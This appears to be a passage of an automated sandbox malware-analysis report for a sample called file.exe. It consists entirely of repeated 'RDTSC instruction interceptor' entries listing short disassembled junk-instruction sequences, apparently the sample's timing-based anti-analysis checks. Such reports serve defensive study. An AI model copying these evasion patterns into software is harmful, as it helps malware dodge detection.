Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A46BFD second address: A46C02 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B9B1 second address: A4B9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B9B7 second address: A4B9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF7D4C1B426h 0x0000000e jmp 00007FF7D4C1B432h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BB44 second address: A4BB4E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7D4C1B3A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BB4E second address: A4BB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BB5B second address: A4BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BB5F second address: A4BB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BB63 second address: A4BB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BCA7 second address: A4BCBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7D4C1B42Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BCBC second address: A4BCC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BDF7 second address: A4BE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BE02 second address: A4BE0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BE0A second address: A4BE14 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7D4C1B432h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BF56 second address: A4BF8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF7D4C1B3B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BF8A second address: A4BF8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4BF8F second address: A4BF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C503 second address: A4C51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B431h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C51F second address: A4C525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C525 second address: A4C529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C8AA second address: A4C8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FF7D4C1B3AFh 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7D4C1B3B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6D9C second address: 9C6DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6DA3 second address: 9C6DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A52BAC second address: A52BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A55197 second address: A5519C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5519C second address: A551A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A551A2 second address: A551BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A551BE second address: A551D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FF7D4C1B434h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A551D4 second address: A551D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A57CE1 second address: A57CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A57624 second address: A57628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A57628 second address: A57634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59BE1 second address: A59BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7D4C1B3A6h 0x0000000a jmp 00007FF7D4C1B3ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A60266 second address: A60294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B439h 0x00000009 pop ebx 0x0000000a jns 00007FF7D4C1B430h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A60294 second address: A602A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7D4C1B3AEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF5D2 second address: 9CF5DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF5DF second address: 9CF5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF5E3 second address: 9CF5FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7D4C1B42Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF5FA second address: 9CF607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF7D4C1B3A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F1F0 second address: A5F204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF7D4C1B426h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F204 second address: A5F214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F214 second address: A5F218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F218 second address: A5F221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A15793 second address: A15797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A157A9 second address: A157AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4AC second address: A5F4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4B4 second address: A5F4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4B8 second address: A5F4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4C6 second address: A5F4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4CA second address: A5F4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F4CE second address: A5F4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F630 second address: A5F665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B431h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF7D4C1B428h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF7D4C1B42Bh 0x0000001d jns 00007FF7D4C1B426h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F665 second address: A5F671 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B3A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5F671 second address: A5F678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62864 second address: A6286A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C1C second address: A62C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FF7D4C1B426h 0x0000000c jo 00007FF7D4C1B426h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C35 second address: A62C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C39 second address: A62C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B437h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C5A second address: A62C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C60 second address: A62C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C64 second address: A62C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF7D4C1B3A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C70 second address: A62C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62C76 second address: A62C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66AA3 second address: A66AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF7D4C1B42Eh 0x0000000f jno 00007FF7D4C1B426h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65D08 second address: A65D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65D12 second address: A65D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65D16 second address: A65D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65EF5 second address: A65EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66019 second address: A66023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66023 second address: A66029 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6616D second address: A661AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF7D4C1B3ADh 0x00000010 jmp 00007FF7D4C1B3B7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66343 second address: A6634D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A664DE second address: A6650B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FF7D4C1B3A6h 0x0000000b ja 00007FF7D4C1B3A6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FF7D4C1B3B8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E55B second address: A6E564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E564 second address: A6E56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF7D4C1B3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6C576 second address: A6C57B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6C6E1 second address: A6C6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF7D4C1B3A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6C6ED second address: A6C6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D085 second address: A6D095 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7D4C1B3A6h 0x00000008 jg 00007FF7D4C1B3A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D095 second address: A6D09F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7D4C1B440h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D09F second address: A6D0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007FF7D4C1B3A6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jns 00007FF7D4C1B3A6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D0CD second address: A6D0EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B433h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF7D4C1B426h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA0D second address: A6DA36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ABh 0x00000007 jng 00007FF7D4C1B3A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7D4C1B3ACh 0x00000016 jnp 00007FF7D4C1B3A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA36 second address: A6DA3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA3C second address: A6DA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF7D4C1B3A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA48 second address: A6DA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA4C second address: A6DA70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FF7D4C1B3AEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF7D4C1B3AAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA70 second address: A6DA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DA76 second address: A6DA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DCEE second address: A6DD14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF7D4C1B438h 0x00000008 js 00007FF7D4C1B426h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DD14 second address: A6DD18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DD18 second address: A6DD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76ED0 second address: A76ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76280 second address: A76285 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76285 second address: A762BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3ADh 0x00000009 pop esi 0x0000000a jmp 00007FF7D4C1B3B2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FF7D4C1B3A8h 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007FF7D4C1B3A8h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7659C second address: A765A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A766EB second address: A766F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76864 second address: A76878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B42Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76878 second address: A76880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76880 second address: A76884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A769E7 second address: A769EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80FC7 second address: A80FD1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80FD1 second address: A80FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7F220 second address: A7F231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jo 00007FF7D4C1B461h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
